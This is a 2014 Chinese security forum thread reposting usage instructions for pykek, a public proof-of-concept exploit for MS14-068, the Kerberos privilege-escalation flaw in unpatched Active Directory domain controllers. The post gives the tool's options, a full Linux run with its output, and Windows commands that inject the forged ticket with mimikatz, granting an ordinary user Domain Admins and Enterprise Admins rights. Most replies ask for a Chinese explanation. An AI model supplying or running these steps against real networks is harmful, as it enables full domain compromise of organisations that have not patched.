查看: 14707|回复: 7

MS14-068 privilege escalation PoC

[复制链接]
  • TA的每日心情

    2024-12-14 22:22
  • 签到天数: 1631 天

    [LV.Master]伴坛终老

    发表于 2014-12-6 09:20:08 | 显示全部楼层 |阅读模式
    forum:DM_

    http://github.com/bidord/pykek

    ms14-068.py

    Exploits MS14-680 vulnerability on an un-patched domain controler of an Active Directory domain to get a Kerberos ticket for an existing domain user account with the privileges of the following domain groups :

    Domain Users (513)
    Domain Admins (512)
    Schema Admins (518)
    Enterprise Admins (519)
    Group Policy Creator Owners (520)

    USAGE:
    [AppleScript] 纯文本查看 复制代码
    ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr> 
    
    OPTIONS: 
        -p <clearPassword> 
    --rc4 <ntlmHash> 
    Example usage : 
    
    Linux (tested with samba and MIT Kerberos) 
    
    root@kali:~/sploit/pykek# python ms14-068.py -u [email]user-a-1@dom-a.loc[/email] -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc 
    Password: 
      [+] Building AS-REQ for dc-a-2003.dom-a.loc... Done! 
      [+] Sending AS-REQ to dc-a-2003.dom-a.loc... Done! 
      [+] Receiving AS-REP from dc-a-2003.dom-a.loc... Done! 
      [+] Parsing AS-REP from dc-a-2003.dom-a.loc... Done! 
      [+] Building TGS-REQ for dc-a-2003.dom-a.loc... Done! 
      [+] Sending TGS-REQ to dc-a-2003.dom-a.loc... Done! 
      [+] Receiving TGS-REP from dc-a-2003.dom-a.loc... Done! 
      [+] Parsing TGS-REP from dc-a-2003.dom-a.loc... Done! 
      [+] Creating ccache file 'TGT_user-a-1@dom-a.loc.ccache'... Done! 
    root@kali:~/sploit/pykek# mv [email]TGT_user-a-1@dom-a.loc.ccache[/email] /tmp/krb5cc_0


    On Windows
    [AppleScript] 纯文本查看 复制代码
    python.exe ms14-068.py -u [email]user-a-1@dom-a.loc[/email] -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc 
    mimikatz.exe "kerberos::ptc [email]TGT_user-a-1@dom-a.loc.ccache[/email]" exit`

    评分

    参与人数 1i币 +16 收起 理由
    C4r1st + 16 感谢分享

    查看全部评分

    回复

    使用道具 举报

  • TA的每日心情
    奋斗
    2017-8-21 09:22
  • 签到天数: 181 天

    [LV.7]常住居民III

    发表于 2014-12-6 09:28:10 | 显示全部楼层
    本地测试一下,但是必须回复

    评分

    参与人数 1i币 +8 收起 理由
    90_ + 8 这是个好习惯~

    查看全部评分

    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    慵懒
    2022-4-16 15:45
  • 签到天数: 247 天

    [LV.8]以坛为家I

    发表于 2014-12-6 12:11:53 | 显示全部楼层
    域内提权,感谢分享。不过,来点中文好不好,小学生看不懂。
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2016-8-27 01:19
  • 签到天数: 50 天

    [LV.5]常住居民I

    发表于 2014-12-6 14:23:00 | 显示全部楼层
    小学生看不懂英文啊
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2021-9-9 23:35
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2014-12-6 21:04:29 | 显示全部楼层
    求注释= =
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    无聊
    2017-6-1 14:33
  • 签到天数: 97 天

    [LV.6]常住居民II

    发表于 2014-12-8 00:46:32 | 显示全部楼层
    全英文,,,看着有点蛋疼!能不能注解下
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2014-12-8 09:37:50 | 显示全部楼层
    小学生  看不懂。。。。。
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2015-11-5 16:29
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2014-12-8 20:49:45 | 显示全部楼层
    看了好半天啊
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-23 05:57 , Processed in 0.026157 second(s), 17 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部